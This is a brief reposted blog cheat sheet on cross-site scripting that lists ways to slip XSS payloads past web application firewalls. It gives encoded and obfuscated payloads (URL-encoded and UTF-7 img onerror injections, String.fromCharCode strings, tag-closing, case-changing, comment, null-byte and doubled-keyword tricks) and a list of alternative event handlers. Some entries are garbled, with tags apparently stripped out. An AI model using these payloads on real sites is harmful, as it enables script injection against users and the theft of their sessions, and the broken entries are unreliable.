Cross site scripting,XSS,bypass XSS filter,xss payload

Cross Site Scripting (Cross Site Scripting, XSS) is a Web application attack in the data output to the page when there is a problem, leading to an attacker can be constructed malicious data displayed in the page vulnerability. Because the cross-site scripting attacks are to the page content to write a malicious script or HTML code, so cross-site scripting vulnerability is also known as HTML injection vulnerability.

How to bypass WAF:

Encoding bypass
Hex encode: alert(‘123’)jsfuck
Url encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
Unicode encode: +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4-

magic_quotes_gpc bypass: String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)

close tag:
“>alert(/123/)
alert(1)

Case insensitive: alert(‘123’)

use other tag: XSS
<img a=”
“onsubmit=javascript:alert(1)%20name=”a

use comment: %0aalert(1);
/**/
%00

Two-letter bypass:

alalertert(123)

Other events bypassonload
onclick
onerror
prompt
confirm
onmousemove

The post Cross site scripting (XSS) :Some techniques to bypass WAF appeared first on Penetration Testing in Linux. http://ift.tt/2pm5VF1 http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s